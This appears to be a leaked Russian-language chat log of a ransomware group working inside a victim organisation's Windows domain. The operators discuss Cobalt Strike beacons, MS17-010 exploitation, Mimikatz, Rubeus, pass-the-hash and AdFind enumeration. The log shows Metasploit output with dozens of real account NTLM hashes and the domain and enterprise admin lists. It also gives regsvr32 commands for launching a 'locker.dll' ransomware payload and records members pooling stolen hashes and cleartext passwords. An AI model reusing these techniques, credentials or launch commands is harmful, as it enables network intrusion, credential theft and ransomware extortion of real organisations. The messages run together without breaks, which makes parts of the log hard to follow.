](https://mediaeveryone.com/group/lrhc-org?msg=pyWba7aHGMXYo8gd2) не поверишьдавайте порядкуне залито[ ](https://mediaeveryone.com/group/lrhc-org?msg=hF9NeXsdrJkqW3NSi) так ронять и нельзя[ ](https://mediaeveryone.com/group/lrhc-org?msg=zhkZaHHwvy2xRkCEg) залито куда?как сняли ад инфо сабов?как там с кобой обстоит вопрос` @migrate [pid]````
Invoke-Mimikatz
````Invoke-PSInject.ps1``jyrkwa`ронять его бессмысленнорубеус только уже потом если имея кобуInvoke-Kerb создаёт пустой файл 1 кбайт в обоих трастахсофос жрёт всё роняетсячерез врд тоже не даёт скачать@tl1 это все адинфо если чевсё остальное минуса``
[*][*] 192.168.254.92:445 - 192.168.254.92:445 - Starting SMB login bruteforce
192.168.254.93:445 - 192.168.254.93:445 - Starting SMB login bruteforce
[192.168.254.92:445 - 192.168.254.92:445 - Correct credentials, but unable to login: 'lrhc\admin:aad3b435b51404eeaad3b435b51404ee:d763de4cc9fe59203df903a5d98f8414',
[*] 192.168.254.93:445 - 192.168.254.93:445 - Correct credentials, but unable to login: 'lrhc\admin:aad3b435b51404eeaad3b435b51404ee:d763de4cc9fe59203df903a5d98f8414',
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\svc-aadc:aad3b435b51404eeaad3b435b51404ee:a5ed4977ab742434bd35761f3cb4c028'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\svc-aadc:aad3b435b51404eeaad3b435b51404ee:a5ed4977ab742434bd35761f3cb4c028'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\AvamarBackupUser:aad3b435b51404eeaad3b435b51404ee:d6538f029c412d2acf4ab547ee69bfce'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\AvamarBackupUser:aad3b435b51404eeaad3b435b51404ee:d6538f029c412d2acf4ab547ee69bfce'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\CDW.Tech1:aad3b435b51404eeaad3b435b51404ee:8e7aca5c0b671015c90656325fb9ea15'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\CDW.Tech1:aad3b435b51404eeaad3b435b51404ee:8e7aca5c0b671015c90656325fb9ea15'
[*] 192.168.254.93:445 - 192.168.254.93:445 - Correct credentials, but unable to login: 'lrhc\CDW.Tech3:aad3b435b51404eeaad3b435b51404ee:2e41b2db123922abbb0b7417c37376f3',
[*] 192.168.254.92:445 - 192.168.254.92:445 - Correct credentials, but unable to login: 'lrhc\CDW.Tech3:aad3b435b51404eeaad3b435b51404ee:2e41b2db123922abbb0b7417c37376f3',
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\PRHADMIN:aad3b435b51404eeaad3b435b51404ee:6cbf599483886475349b36ee6ad42e'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\PRHADMIN:aad3b435b51404eeaad3b435b51404ee:6cbf599483886475349b36ee6ad42e'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\cdw.user01:aad3b435b51404eeaad3b435b51404ee:70c6dad1c8b04eb86f2e10a9a2165132'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\cdw.user01:aad3b435b51404eeaad3b435b51404ee:70c6dad1c8b04eb86f2e10a9a2165132'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\gsnelson:aad3b435b51404eeaad3b435b51404ee:d899502f6f216eb35493afa551999c51'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\gsnelson:aad3b435b51404eeaad3b435b51404ee:d899502f6f216eb35493afa551999c51'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\nmsapps:aad3b435b51404eeaad3b435b51404ee:4ee914b92d24c2e3fc45de8d41df4cbd'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\nmsapps:aad3b435b51404eeaad3b435b51404ee:4ee914b92d24c2e3fc45de8d41df4cbd'
[+][+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\OnPremMigAdmin2:aad3b435b51404eeaad3b435b51404ee:58a6d0022d4a8d3cb892d2ff1754b7aa'
192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\OnPremMigAdmin2:aad3b435b51404eeaad3b435b51404ee:58a6d0022d4a8d3cb892d2ff1754b7aa'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\OnPremMigAdmin3:aad3b435b51404eeaad3b435b51404ee:65336cc5f0fb38689a687aabb17f658f'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\OnPremMigAdmin3:aad3b435b51404eeaad3b435b51404ee:65336cc5f0fb38689a687aabb17f658f'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\PsService:aad3b435b51404eeaad3b435b51404ee:327db612d1d53ac8477a49ae667d523c'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\PsService:aad3b435b51404eeaad3b435b51404ee:327db612d1d53ac8477a49ae667d523c'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\Pssupport01:aad3b435b51404eeaad3b435b51404ee:8c3c72c186ece567004a620aff55d842'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\Pssupport01:aad3b435b51404eeaad3b435b51404ee:8c3c72c186ece567004a620aff55d842'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\radmin:aad3b435b51404eeaad3b435b51404ee:9ed5d85f0709fbf0f343bce62851b726'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\radmin:aad3b435b51404eeaad3b435b51404ee:9ed5d85f0709fbf0f343bce62851b726'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\TMSXE.Service01:aad3b435b51404eeaad3b435b51404ee:a6aea38d860ac5c1e980a7724bd0362e'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\TMSXE.Service01:aad3b435b51404eeaad3b435b51404ee:a6aea38d860ac5c1e980a7724bd0362e'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\UCAdmin:aad3b435b51404eeaad3b435b51404ee:1c7c0878a380b6e004f97cd62af6398b'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\UCAdmin:aad3b435b51404eeaad3b435b51404ee:1c7c0878a380b6e004f97cd62af6398b'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\Administrator:aad3b435b51404eeaad3b435b51404ee:a5ed4977ab742434bd35761f3cb4c028'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\Administrator:aad3b435b51404eeaad3b435b51404ee:a5ed4977ab742434bd35761f3cb4c028'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\CDW.Tech2:aad3b435b51404eeaad3b435b51404ee:3cdfe7a54e9674555e5be6425583783b'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\CDW.Tech2:aad3b435b51404eeaad3b435b51404ee:3cdfe7a54e9674555e5be6425583783b'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\cisadmin:aad3b435b51404eeaad3b435b51404ee:aa5bda0004c32ef20e32cad3d570018f'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\cisadmin:aad3b435b51404eeaad3b435b51404ee:aa5bda0004c32ef20e32cad3d570018f'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\jyrkwa:aad3b435b51404eeaad3b435b51404ee:ce52742a372f62d7100e9ca7b5f13369'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\jyrkwa:aad3b435b51404eeaad3b435b51404ee:ce52742a372f62d7100e9ca7b5f13369'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\OnPremMigAdmin1:aad3b435b51404eeaad3b435b51404ee:f004e3bd8070f91f2e92ff45f69f1525'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\OnPremMigAdmin1:aad3b435b51404eeaad3b435b51404ee:f004e3bd8070f91f2e92ff45f69f1525'
[192.168.254.92:445 - 192.168.254.92:445 - Failed: 'lrhc\pmpetecc:aad3b435b51404eeaad3b435b51404ee:4df15363fbf1bf8218e9e77ee0808ea5',
[192.168.254.93:445 - 192.168.254.93:445 - Failed: 'lrhc\pmpetecc:aad3b435b51404eeaad3b435b51404ee:4df15363fbf1bf8218e9e77ee0808ea5',
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\PsSupport:aad3b435b51404eeaad3b435b51404ee:8c3c72c186ece567004a620aff55d842'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\PsSupport:aad3b435b51404eeaad3b435b51404ee:8c3c72c186ece567004a620aff55d842'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\tms01:aad3b435b51404eeaad3b435b51404ee:a6aea38d860ac5c1e980a7724bd0362e'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\tms01:aad3b435b51404eeaad3b435b51404ee:a6aea38d860ac5c1e980a7724bd0362e'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\WebAdmin:aad3b435b51404eeaad3b435b51404ee:83fdf8f37840cf8e171223c0de1b16eb'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\WebAdmin:aad3b435b51404eeaad3b435b51404ee:83fdf8f37840cf8e171223c0en1b16eb'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\frsecure:aad3b435b51404eeaad3b435b51404ee:6888441821d91affeb5f8cad8a6cad7b'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\frsecure:aad3b435b51404eeaad3b435b51404ee:6888441821d91affeb5f8cad8a6cad7b'
[192.168.254.92:445 - 192.168.254.92:445 - Failed: 'lrhc\lljennbi:aad3b435b51404eeaad3b435b51404ee:2cd71f9ad45c45c9bd25eb978657f867',
[192.168.254.93:445 - 192.168.254.93:445 - Failed: 'lrhc\lljennbi:aad3b435b51404eeaad3b435b51404ee:2cd71f9ad45c45c9bd25eb978657f867',
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
```а компыя пока отойдуи после проверки админов можешь поизучать пш эмпайр+в три заходаладно тогда по очереди сначала ЛА потом текущий потом трастовыйв файл пишутся только логин пассно вроде домен пишется отдельночестно подзабыля просто думаю всех разом хуйнуть или сначала так, потом сяк и сякв файле прописывать домен или в SMBDomain всем отдельно указывать?домен в смб_логине же указывается как отдельная опциятогда всё-таки есть вопросокес доменом трастас доеном текущегот е без доменадаже с 3да?с доменом тожеили как ты ранее сказалчисто ЛА чекаю без доменаа или нет.так вопрос по USERPASS_FILE в смб_логинеокчтобы через пш эмпайр работать в текущем домене вместо кобыя поэтому и спросилтак а че ты мне про него говоришьна вин2003 нет пш))и к слову про пш эмпайр и вин2003ладноили хотя бы новая кобапоговорим дальше)как будет ЛА на дк в том доменепроверь хеши как и договорилисьпока не трогайтак в пш емпайр реально притянуть 2003?пш умет работать с хешеми сразу запасной вариантокейпока чекай админовновая коба будет через пару часовтак воткак админы сети настраивают оборудование и с использованием чего это долгая дискуссияи о приватныхпросто на каких-то открытых источниках с данными о кобах и прочих утилитахчестно не хочу сейчас разбирать эту темупосле закрытия сети кобы сразу пачкаются говномты ж ему в кобу сетку выдала как @user4 работает тогда?вы ими уже давненько работайтеу всех кобы в блнашукаждуюи моя тожевсе прямтак я говорю все кобы пиганулну значит твоя коба таки в бли тратить времялол)```
C:\Users\wevvewe\Desktop>ping google.com
Pinging google.com [172.217.4.238] with 32 bytes of data:
Reply from 172.217.4.238: bytes=32 time=30ms TTL=127
Reply from 172.217.4.238: bytes=32 time=31ms TTL=127
Reply from 172.217.4.238: bytes=32 time=31ms TTL=127
Reply from 172.217.4.238: bytes=32 time=31ms TTL=127
Ping statistics for 172.217.4.238:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 30ms, Maximum = 31ms, Average = 30ms
C:\Users\wevvewe\Desktop>ping fullref.com
Pinging fullref.com [45.128.156.27] with 32 bytes of data:
Reply from 45.128.156.27: bytes=32 time=65ms TTL=127
Reply from 45.128.156.27: bytes=32 time=65ms TTL=127
Reply from 45.128.156.27: bytes=32 time=65ms TTL=127
Reply from 45.128.156.27: bytes=32 time=65ms TTL=127
Ping statistics for 45.128.156.27:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 65ms, Maximum = 65ms, Average = 65ms
C:\Users\wevvewe\Desktop>ping wikibros.com
Pinging wikibros.com [198.18.0.1] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
``нежели изучать емпайря думаю лучше сделать чем умеюдай пинг домена вышетогда план такойего еще изучить надоне пробовалпш эмайр работает?)и кстати вопрос на миллиондай пинг `fullref.com`гугл пингуетсяно кобы?давпн видит внешку?а скажи вот чтовот так те же ответы23[.]106[.]61 cobaltой блятьвозможно я не так понял что-тоне все сразу сказали конечноа конкретнее?коллеги10[.]10[.] и так далее[.]кто сказал?ну мне тут так сказалитакже в кавычках и апострофахну неправильновот этот ипо аналогичнопо ип?'wikibros.com' cobalt)а как гуглил??засветилсявсё получаетсяwikibros.comпо айпи ничего не даёт
по имени домена отправляет на фандом по мариовсё окну как я и говорюсроси у коллег которые по гоферу работают как понятьда прямо написано: tvoya koba zasvechena tikay s gorodyподобного просто ничего нет?ОСТЕРЕГАЙТЕСЬ ВАМ ПИЗДА ЕСЛИ ВЫ ВИДИТЕ ЭТОТ ДОМЕН/АЙПИтам будет прям написаноесли моя коба засвечена, как это понять?и попутно чекайте админова проверь по айпи домена листа "айпи" кобальтвот недавно проверилроверьдумаю уже давроде нетвоя засветилась?мне твои коллеги недавно сказали что их кобы засвечены100% лосся все наши кобы пинганул с дедика и дк текущего доменаа про кобытам ping wideio.com не отзываетсяя про этотак на 2003 вообще повершела нета текущий видит2003 тпш не видиттвоя коба какой свежести?)но не всеми тпш виднодакобу а мсф видно?а за впном кобу не видноидешь в трасттак дедик за впномделаешь токен админаpthя понимаю в процесс можно обернуть дедик в кобус хэшеми че делатьпотом условно 1-2 подошлидана ЛАначинаюнунети начинаешь по очереди прогонять на оба ДКа ты про кмд5 опять1 к 1с их хешемиты берешь текущих ДА и ЕАтам условный буртпочему?да многоно обращаться то как без возможности создать токен через хэшчто с хэшем можно брутитьэто я понимаюс хэшем тоа smb_login любит хешиа смыслу тех которых я ТОЧНО брутил пароли одинаковыеа хеши для всех)клир креды есть для 4``
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
admin Administrator AvamarBackupUser
CDW.Tech1 CDW.Tech2 CDW.Tech3
cdw.user01 cisadmin frsecure
gsnelson jyrkwa lljennbi
nmsapps OnPremMigAdmin1 OnPremMigAdmin2
OnPremMigAdmin3 pmpetecc PRHADMIN
PsService PsSupport Pssupport01
radmin tms01 TMSXE.Service01
UCAdmin WebAdmin
The command completed successfully.
```
```
Group name Enterprise Admins
Comment Designated administrators of the enterprise
Members
-------------------------------------------------------------------------------
Administrator frsecure jyrkwa
PsService PsSupport Pssupport01
svc-aadc tms01 TMSXE.Service01
UCAdmin
The command completed successfully.
``я уже запутался мы их тут как тольок не называемновую кобу в плане новую сетку или тим сервер?я проверял вчера, но не помню кого
точно проверил
```
lrhc\Administrator
svc-aadc
mcklrh\svc-aadc
lrhc\svc-aadc
```через 2 часа выдам новую кобув общем прогоняем все ДА, ЕА на ДК трастаможно брутить)```
The request will be processed at a domain controller for domain mcklrh.mig.
Force user logoff how long after time expires?: Never
Minimum password age (days): 0
Maximum password age (days): Unlimited
Minimum password length: 5
Length of password history maintained: 1
Lockout threshold: Never
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: PRIMARY
The command completed successfully.
```дай нет аккаунти безс указанием домена соотвественновзять все ДА из текущего домена и попробова их локальным админа на оба дквижу пока такой вариантсмотриэто не от мс17 зависитда и разве можно добавить через мс17 не в локальную группу?но шанс велик проебать всёя думал об этомно шумный методпотом его снятьсделать своего ДА и под ним быстро залететь в доменкак вариантпотом прибилесли быть точнее 30-40 минутдаа процес висел час?хоть и 0 байтфайлы же создавалисьтак с правами то ок быломожешь проверить в windows\temp чтобы отбросить сомненияно хотя это 2003 мб там прав не хватало на корень...аокно раз ты сказал что и в корень диска пробовал то вариант отпаля же тебе сказал проверь windows\tempну даProgramData это не папкана 2003кстати ржомба только ща заметилвчера делал с впс-ки и выдавало ошибкуща все-же попробую тогда на дедик длл сделать и оттуда в мсф-е enum_ad_* сделаюдумал хоть здесь чего-то выйдет путнегоя поэтому в мсф и перешёлдавсе равно мимо да?я так и пробовал изначальнодедик - доменная тачка - опрос трастаи получается связьчерез вмик под кредами ДА запускаешь файлы которые снимают ад с траста который ты указал в батникеты из дедика прокидываешь файлы для снятия ад внутрь домена на какой нибудь серверлови мысль)это единственная тачка доступнаячто это косяк внутри негоя могу ссылатся на вин2003смб_логином я его чекалон там доменный юзерадмин которого я добавилда не смаривот и траст тебе ничего не даетда и ты сам не доменный пользакмб дело в том что твоя тачка официально не в домене+ из контекста ДАа попробуй сделать запрос через трас из тачки доменачерез метера с трастов я пытаюсьдаа с трастовчерез вми?вотагакак и нтдсудалённос дедикая в текущем домене снимал адфайнд батничкомотривсмыслеты как адфайн запускал если с дедика за впном?енум_ад_юзерспросто с сесией метера на впске это не отрабатываета вопрос такойпока не делайнеща длку новую сделаю тогда, видел, просто туда сесия метера нужна
я мс17 тозаю с дедика сидя за их впном, а метер у меня на впс-ку, думал как-то получится без этого, но придётся на дедик в мсф сесию тянутьсделайте поиск enum_ad_*в msf есть модуль enum_ad_usersкстати точноа еще я не понимаю зачем, у @user8 сесия там есть же?в hosts надоа ты куда залил то?))https не поддерживаетсяhttp://как загружать на тачку файлы через тпш? у меня не получаетсяда вродеа внешку видит?нету чотаа проверька unatted файлыгде вмиком, где мс17и так и сяка ты там команды запускаешь через мс17?еще не снял, мне рубеус режет когда на дедик его закидываю, хотя виндеф я отрубил, а инвок-керб на пшкербы то были?а в трасте в процесах не вижу егов текущем доменеусловно на текущей тачке он в процесах естьхотя с другой стороны в процесах его не видатьно может и софосчто там софосесть еще предположениемне тоже кажется софося и в корень пробовалмм там видимо софос стоита смыслпоробуй переснять ад в эту папкуагатам в основном такие файлыу меня он в терминал не влезвесь дир кидать не буду``
C:\Program Files\Microsoft Azure AD Sync\UIShell>tasklist /s 192.168.254.107 /v
tasklist /s 192.168.254.107 /v
Image Name PID Session Name Session# Mem Usage User Name CPU Time
========================= ======== ================ =========== ============ ================================================== ============
System Idle Process 0 Console 0 16 K NT AUTHORITY\SYSTEM 4152:02:24
System 4 Console 0 268 K NT AUTHORITY\SYSTEM 0:19:18
smss.exe 456 Console 0 496 K NT AUTHORITY\SYSTEM 0:00:00
csrss.exe 876 Console 0 4,236 K NT AUTHORITY\SYSTEM 0:02:07
winlogon.exe 916 Console 0 13,652 K NT AUTHORITY\SYSTEM 0:00:08
services.exe 960 Console 0 66,924 K NT AUTHORITY\SYSTEM 3:56:01
lsass.exe 972 Console 0 27,744 K NT AUTHORITY\SYSTEM 0:28:38
svchost.exe 1152 Console 0 3,568 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 1604 Console 0 4,820 K NT AUTHORITY\NETWORK SERVICE 0:20:17
SavService.exe 1684 Console 0 260,956 K NT AUTHORITY\LOCAL SERVICE 4:45:31
svchost.exe 1428 Console 0 6,224 K NT AUTHORITY\NETWORK SERVICE 0:00:06
svchost.exe 1444 Console 0 7,272 K NT AUTHORITY\LOCAL SERVICE 0:00:02
svchost.exe 1492 Console 0 25,288 K NT AUTHORITY\SYSTEM 1:57:11
spoolsv.exe 556 Console 0 5,704 K NT AUTHORITY\SYSTEM 0:00:52
msdtc.exe 580 Console 0 5.048 K NT AUTHORITY\NETWORK SERVICE 0:00:00
avagent.exe 476 Console 0 9,012 K NT AUTHORITY\SYSTEM 2:05:38
cpqrcmc.exe 1380 Console 0 1,380 K NT AUTHORITY\SYSTEM 0:00:00
vcagent.exe 1408 Console 0 7,800 K NT AUTHORITY\SYSTEM 0:00:00
Tuner.exe 1572 Console 0 2,664 K NT AUTHORITY\SYSTEM 0:00:09
svchost.exe 1732 Console 0 2,644 K NT AUTHORITY\SYSTEM 0:00:00
INETDSRV.exe 1924 Console 0 2,872 K NT AUTHORITY\SYSTEM 0:00:00
machd.exe 1960 Console 0 1,960 K NT AUTHORITY\SYSTEM 0:00:00
nmserver.exe 252 Console 0 3,832 K NT AUTHORITY\SYSTEM 0:00:00
ntfrs.exe 772 Console 0 1,616 K NT AUTHORITY\SYSTEM 0:00:19
svchost.exe 836 Console 0 15,168 K NT AUTHORITY\LOCAL SERVICE 0:11:34
RCMDSVC.EXE 1460 Console 0 1,220 K NT AUTHORITY\SYSTEM 0:00:00
SAVAdminService.exe 1808 Console 0 4,300 K NT AUTHORITY\SYSTEM 0:00:18
snmp.exe 2116 Console 0 7,052 K NT AUTHORITY\SYSTEM 0:04:09
ALsvc.exe 2216 Console 0 1,828 K NT AUTHORITY\SYSTEM 0:00:20
McsAgent.exe 2412 Console 0 16,440 K NT AUTHORITY\SYSTEM 0:11:23
McsClient.exe 2568 Console 0 7,952 K NT AUTHORITY\NETWORK SERVICE 0:00:05
swc_service.exe 2688 Console 0 4,668 K NT AUTHORITY\SYSTEM 0:00:00
swi_service.exe 2744 Console 0 29,560 K NT AUTHORITY\SYSTEM 0:00:05
smhstart.exe 3048 Console 0 3,848 K NT AUTHORITY\SYSTEM 0:00:00
hpsmhd.exe 3180 Console 0 12,280 K NT AUTHORITY\SYSTEM 0:00:01
cpqnimgt.exe 3244 Console 0 6,248 K NT AUTHORITY\SYSTEM 0:00:00
cqmgserv.exe 3304 Console 0 3,584 K NT AUTHORITY\SYSTEM 0:00:15
cqmgstor.exe 3352 Console 0 5,680 K NT AUTHORITY\SYSTEM 0:00:33
dfssvc.exe 3384 Console 0 3,884 K NT AUTHORITY\SYSTEM 0:00:00
sysdown.exe 3476 Console 0 2,036 K NT AUTHORITY\SYSTEM 0:00:00
cqmghost.exe 3632 Console 0 8,232 K NT AUTHORITY\SYSTEM 4:49:33
wmiprvse.exe 3660 Console 0 8,020 K NT AUTHORITY\SYSTEM 0:00:01
rotatelogs.exe 3852 Console 0 2,560 K NT AUTHORITY\SYSTEM 0:00:00
rotatelogs.exe 3860 Console 0 2,540 K NT AUTHORITY\SYSTEM 0:00:00
hpsmhd.exe 3916 Console 0 18,236 K NT AUTHORITY\SYSTEM 0:00:01
rotatelogs.exe 3988 Console 0 2,572 K NT AUTHORITY\SYSTEM 0:00:00
rotatelogs.exe 3996 Console 0 2,552 K NT AUTHORITY\SYSTEM 0:00:00
wmiprvse.exe 5168 Console 0 38,700 K NT AUTHORITY\NETWORK SERVICE 3:27:29
svchost.exe 5992 Console 0 12,236 K NT AUTHORITY\SYSTEM 0:00:22
alg.exe 6136 Console 0 3,696 K NT AUTHORITY\LOCAL SERVICE 0:00:00
logon.scr 4272 Console 0 2,004 K NT AUTHORITY\LOCAL SERVICE 0:00:00
minituner.exe 4816 Console 0 2.732 K NT AUTHORITY\SYSTEM 0:00:00
```
```
02/08/2020 03:56 PM 134 Sophos AutoUpdate 5.8.358 setup log 20200208 155610.txt
```я чет в метер кинуть не могугде утебя мап в общемчерез Yщадай dir C:\windows\tempа внутри не показываетчто такая папка естьон мне просто говоритdir Y:\ProgramData\как бы я пишу емув дирректории меня не пускалон вообще кривойне припомню?а на 2003 какой-то ав есть*да никого вроде не было вчера, ща переснимув списке процесов кто интересный есть?был бы вариант это обыграть через пш, но это 2003только туда уязвимость былабля 2003я ж писаля сам добавил ЛА через мс17 на сервер 2003из имеющихся кред никто в тот домен не прошёл с админ правами+ общего ЕАпроверь сюда текущего пользака который в домен проходил как ЛА``
[+] 192.168.254.92:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:RADDC01) (domain:MCKLRH)
[+] 192.168.254.93:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:RADDC02) (domain:MCKLRH)
``````
Get list of DCs in domain '' from '\\RadDC01.mcklrh.mig'.
RADDC02.mcklrh.mig [DS] Site: Default-First-Site-Name
RADDC01.mcklrh.mig [PDC] [DS] Site: Default-First-Site-Name
The command completed successfully
`из кмд`nltest /dclist:`вот щас ты угораешь)я так и не разобрался как список дк снимать через кмд, но полагаю в выводе smb_version всё дксписок дк получалось взять?[ ](https://mediaeveryone.com/group/lrhc-org?msg=SJGwmz8PfccJxvxKz) даи стояло по часуиногда повисало просто[ ](https://mediaeveryone.com/group/lrhc-org?msg=qEA6bRBWBs5fgK4MW) в таком варианте получается создаются файлы размером 0?тут либо 0 объектов, либо ERROR: 0x1``
AdFind.exe -f "(objectcategory=person)" -h 192.168.254.107 > ad_usr.txt
AdFind.exe -b DC=mcklrh,DC=mig -f "(objectcategory=person)" > ad_usr.txt
AdFind.exe -b DC=mcklrh,DC=mig -f "(objectcategory=person)" -h 192.168.254.107 > ad_usr.txt
``удалённо делал такэто если роняюсоздаёт 0 байт файлы``
C:\ProgramData\AdFind.exe -f "(objectcategory=person)" > C:\ProgramData\ad_usr.txt
C:\ProgramData\AdFind.exe -f "objectcategory=computer" > C:\ProgramData\ad_comp.txt
C:\ProgramData\AdFind.exe -f "(objectcategory=organizationalUnit)" > C:\ProgramData\ad_ous.txt
C:\ProgramData\AdFind.exe -subnets -f (objectCategory=subnet) > C:\ProgramData\subnets.txt
C:\ProgramData\AdFind.exe -f "(objectcategory=group)" > C:\ProgramData\ad_group.txt
C:\ProgramData\AdFind.exe -gcb -sc trustdmp > C:\ProgramData\trustdmp.txt
```[ ](https://mediaeveryone.com/group/lrhc-org?msg=ZWhp95o9pM6t8Hj8F) дай команду запуска + содержимое батника + команду копирования[ ](https://mediaeveryone.com/group/lrhc-org?msg=XwZdctaDSWS7Rjkjr) ,или даже так не работает?ты че угараешь надо мнойи снять вмиком?а в чем проблема адфайнд закинуть в трастовую тачкуяхунини ад инфуя ж говорюно толку тоон работает))))дат е у тебя в траст вмик работает?а к нему замапил трастя сейчас в мсф протянул текущий домену меня там свой ЛАтак нет жечерез мс17?у тебя точка входа в траст одна получается?без флага кипи дл не удаляетсяно сессии нетпш/рандлпроцесс в кобуни в тпшни в мсфвообще никудапритянуть траст тоже не получилосьокей понялпробовал ронять в трастовый домен ехе и батник и удалённо запускатьпробовал в текущем домене с указанием трастового домена/хоста дк трастового доменая описал это)как снимал ад с трастов?и последний вопрос чтобы закрыть этот диалогтак понятно?а он мне - 0 объектовя же знаю, что там как минимум несколько компов на серверной виндесли бы это были не компыпоследнее можно бы посчитать правдивыми мне вываливало либо ошибку, либо зависало, либо 0 объектови так уже пытался снять ад инфупотом добавил туда ЛА своегоиз трёх трастов один в карантине
из двух оставшихся доступ есть в один
в этом одном я через мс17 запросил ДА и ЕАя же всё описализ трастакакиха как ты нашел тогда юзеров....файл был пустойи когда она былаошибка в консолитак у тебя ошибка была или я не пойму?я трасты переснимал без вывода в файл, а файлы 0 байт смысл литьты не заливаешь файлы в конфукербы не снимал, сейчас займусьесли 1, то я переснимал вчера трасты и там ничего не изменилось
если 2, то я уже написал, что снять их не вышло[ ](https://mediaeveryone.com/group/lrhc-org?msg=TScXrhybTsQ7gZhsa) в плане переснять с текущего домена или ад инфу из самих трастов?``
ОБНОВЛЕНИЕ добавлен функционал варианта запуска локера, что снимает часть АВ детектов при дропе на диск
Запуск через regsvr32
regsvr32.exe /s locker.dll - без аргументов
regsvr32.exe /s /n /i: "тут аргументы" - с аргументами
``#corp-televisa-com-mx#pcsb-orgчто у вас в работе на данный момент?спасибо`yufdvfte5645warKHAGBSD`380fd7621d03826307b8993ad84c2ecf)жду хешиэто в корне все меняет)аа, ну раз нажал не доверять...на тилюфонину не доверять то я нажалзаряжатсяс этих есть хэши, местами клиры[ ](https://mediaeveryone.com/channel/general?msg=MpgDjanMwbZxXyA6c) к рабочему пк вы цепляли личный айфон?но вот че естьпридется снова запачкаться и пошерстить конференцииу меня тоже не все остались после переустановкиЯ чищу сразу все после закрытия весь комп. Обливаю святой водой.я не говорю о последней неделедастоп, вообще за все время работы?я говорю о всех кейсах за все время)там в архиве 2 файла, 1 - нтлм, 2 - клиры40 архивов качать не буду)все нтлмы в один архивмешать в один файл не надоглавное делите группы на одинаковыеоба формата сойдутв файле только нтлм?
```
c933798f947972ca9d08ba805008d6ca
```
или так пойдет?
```
CORP\lkperezcer:::8d3fe083b7e1fcb6f7a069fb8d7a75f5:::
``[ ](https://mediaeveryone.com/channel/general?msg=EQ2NwKzr46SjeK49M) глухо. не пускает, куки протухливсе ваши нтлм мне в архивы соберите из своих кейсовмои отвались - попробую перезайтив т ч из публичных ресурсову вас задача максимум на пол часа - собрать максимально большие списки чистых паролей+у вас сети в работе естьdobre rankuтак по задачам на сегодняа, все окЭто странновы у меня двоем в сетиНа базетут всегде?hiВсем приветhi:moyai:что логи хранятся в папкеда и в блоге говоритсякак я понимаюа распаковываетсякобальт же не через инсталта свитсяда и вряд ли логи будут где-то ещёкуча папок вообще пустыенарыл только логи и бэкапы убунтысделаешь рестарт упадут старые сессиискорее в каком то другом месте лежит бэкапесть вариант рестарт сделать?может быть такое, что сервер их помнит тк они были удалены во время его работы?``
root@hostname:~/cobalt/logs# ls
201203
root@hostname:~/cobalt/logs# cd 201203
root@hostname:~/cobalt/logs/201203# ls
